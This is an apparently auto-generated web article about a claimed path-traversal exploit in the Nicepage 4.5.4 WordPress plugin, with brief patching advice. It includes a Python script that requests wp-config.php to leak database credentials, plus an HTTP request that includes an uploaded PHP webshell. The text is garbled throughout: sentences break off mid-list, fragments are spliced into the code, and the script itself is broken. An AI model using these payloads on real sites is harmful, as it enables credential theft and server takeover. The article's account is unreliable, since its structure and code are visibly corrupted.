Nicepage 4.5.4 Exploit ๐ŸŽ

The Nicepage team released version 4.5.5 and subsequent patches (4.6.0+) that:

Action: Go to WordPress Admin > Plugins > Installed Plugins and update Nicepage to the latest version (4.10+ as of 2025).

The nicepage_activate_theme function was designed to import demo content and themes. However, version 4.5.4 failed to verify the authenticity or encoding of the template parameter. Attackers discovered they could inject path traversal sequences (e.g., ../../) followed by a malicious payload.

If your site currently runs Nicepage 4.5.4, consider it compromised. Follow these steps immediately: nicepage 4.5.4 exploit

Security researchers released a minimal Python script to demonstrate the vulnerability:

import requests

target = "http://victim-site.com"
payload = "../../../../wp-config.php"


data = 
"action": "nicepage_activate_theme",
"template": payload
 The Nicepage team released  version 4


r = requests.post(f"target/wp-admin/admin-ajax.php", data=data)


if "DB_NAME" in r.text:
print("[!] Exploit successful! Database credentials leaked.")
print(r.text[:500])
else:
print("[-] Target may be patched.")

Running this against a vulnerable Nicepage 4.5.4 installation would return the database configuration.

The more severe variant involved uploading a webshell. Attackers would combine the LFI with a separate file upload vector (e.g., via the pluginโ€™s media import feature) to place a PHP payload (e.g., malicious.jpg.php) in a temp directory, then use the exploit to include and execute it:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: target-site.com

action=nicepage_activate_theme&template=../../../../wp-content/uploads/nicepage_temp/cmd.php
 Action: Go to WordPress Admin > Plugins >

Once executed, the attacker gains the privileges of the web server user, allowing:

Go to Top